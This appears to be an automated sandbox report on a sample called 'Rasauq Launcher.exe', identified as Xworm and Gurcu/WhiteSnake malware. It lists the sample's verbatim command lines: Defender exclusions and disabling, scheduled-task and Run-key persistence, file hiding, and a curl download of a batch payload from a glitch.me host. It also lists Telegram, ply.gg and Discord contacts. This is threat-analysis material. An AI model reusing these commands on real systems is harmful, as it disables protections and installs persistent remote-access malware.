Analysis Overview
SHA256
9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f
Threat Level: Known bad
The file Rasauq Launcher.exe was found to be: Known bad.
Malicious Activity Summary
Xworm
Xworm family
Modifies security service
Gurcu, WhiteSnake
Contains code to disable Windows Defender
Gurcu family
Detect Xworm Payload
Modifies Windows Defender DisableAntiSpyware settings
Disables service(s)
Modifies boot configuration data using bcdedit
Possible privilege escalation attempt
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Disables Task Manager via registry modification
Modifies Windows Firewall
Drops file in Drivers directory
Sets file to hidden
Manipulates Digital Signatures
Disables RegEdit via registry modification
Checks computer location settings
Executes dropped EXE
Drops startup file
Loads dropped DLL
Modifies file permissions
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Power Settings
Drops file in System32 directory
Sets desktop wallpaper using registry
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Delays execution with timeout.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Modifies registry class
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Checks processor information in registry
Kills process with taskkill
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-20 10:39
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-20 10:39
Reported
2025-03-20 10:42
Platform
win7-20241010-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Detect Xworm Payload
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC4C5.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\system32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\system32\schtasks.exe
"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
C:\Windows\system32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
C:\Windows\system32\taskeng.exe
taskeng.exe {CAE06032-FC22-4ED6-80A7-81342CA70EB4} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | looking-brings.gl.at.ply.gg | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 147.185.221.26:65381 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
C:\Users\Admin\AppData\Local\Temp\Launch.bat
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\Admin\AppData\Local\Temp\tmpC4C5.tmp.bat
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-20 10:39
Reported
2025-03-20 10:42
Platform
win10v2004-20250314-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Contains code to disable Windows Defender
Detect Xworm Payload
Disables service(s)
Gurcu family
Gurcu, WhiteSnake
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Xworm
Xworm family
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" | C:\Windows\system32\reg.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
Modifies registry class
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
C:\Windows\system32\curl.exe
curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
C:\Windows\system32\curl.exe
curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB788.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
